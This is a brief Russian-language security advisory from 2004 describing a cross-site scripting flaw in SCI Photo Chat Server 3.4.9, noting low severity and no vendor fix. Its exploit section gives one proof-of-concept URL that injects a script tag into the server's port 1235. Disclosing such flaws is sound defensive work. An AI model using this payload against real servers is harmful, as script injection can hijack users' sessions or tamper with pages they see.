Межсайтовый скриптинг в SCI Photo Chat Server

Дата публикации:04.07.2004
Всего просмотров:899
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: SCI Photo Chat Server 3.4.9

Описание: Уязвимость в SCI Photo Chat Server позволяет удаленному пользователю выполнить XSS нападение.

Эксплоит:

http://[host]:1235/<script>alert("hy")</script>

URL производителя: http://www.simmcomm.ch/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: XSS in SCI Photo Chat Server 3.4.9